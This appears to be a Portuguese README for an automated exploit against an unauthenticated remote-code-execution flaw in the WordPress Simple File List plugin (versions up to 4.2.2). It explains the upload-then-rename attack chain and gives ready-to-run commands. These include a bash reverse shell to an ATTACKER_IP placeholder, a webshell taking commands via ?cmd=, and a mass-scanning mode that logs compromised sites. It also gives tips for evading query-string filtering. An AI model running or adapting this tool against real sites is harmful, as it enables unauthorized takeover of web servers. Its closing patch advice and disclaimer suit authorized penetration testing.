
Exploit para CVE-2025-34085
Um exploit automatizado para CVE-2025-34085 (duplicata de CVE-2020-36847), uma vulnerabilidade crítica de execução remota de código não autenticada no plugin WordPress Simple File List versões ≤ 4.2.2.
Nota: CVE-2025-34085 foi rejeitado pelo MITRE como duplicata do CVE-2020-36847. A vulnerabilidade é real e corrigida na versão 4.2.3. Ambos os IDs CVE referem-se ao mesmo problema subjacente.
| Campo | Detalhe |
|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| Plugin | Simple File List |
| Versões Afetadas | ≤ 4.2.2 |
| Versão Corrigida | 4.2.3 |
| Tipo | Upload irrestrito de arquivos → Bypass de renomeação → RCE |
| CVSS | 9.8 (Crítico) |
| Autenticação | Nenhuma necessária |
| Descoberta Original | coiffeur |
| Módulo Metasploit | exploit/multi/http/wp_simple_file_list_rce |
Upload — Um payload PHP é carregado disfarçado como um arquivo .png através do endpoint de upload do plugin (ee-upload-engine.php). O mecanismo de upload valida extensões, mas aceita arquivos de imagem.
Renomeação — A funcionalidade de renomeação do plugin (ee-file-engine.php) não impõe restrições de extensão. O atacante renomeia o .png para .php (ou .phtml, .php5, .php3).
Execução — O arquivo PHP renomeado agora está acessível e executável no diretório de uploads em /wp-content/uploads/simple-file-list/, dando ao atacante execução arbitrária de comandos.
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
?cmd=)python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
Crie um arquivo targets.txt com uma URL por linha:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
| Argumento | Descrição | Padrão |
|---|---|---|
-u, --url | URL do alvo único | — |
--cmd | Comando a executar no alvo | id |
--inline | Injetar comando diretamente no shell PHP (hardcoded, sem webshell ?cmd=) | False |
Dica: Use
--inlinequando precisar de um reverse shell ou quando o alvo tiver filtragem de query string. Sem--inline, o exploit cria um webshell que aceita comandos via?cmd=.
Exploits bem-sucedidos são registrados em vuln.txt:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.phpvuln.txt — útil para seu relatório--inline com um reverse shell para evitar deixar um webshell persistente com ?cmd=Atualize o plugin Simple File List para a versão 4.2.3 ou superior.
Esta ferramenta é destinada apenas para testes de penetração autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha autorização adequada antes de testar.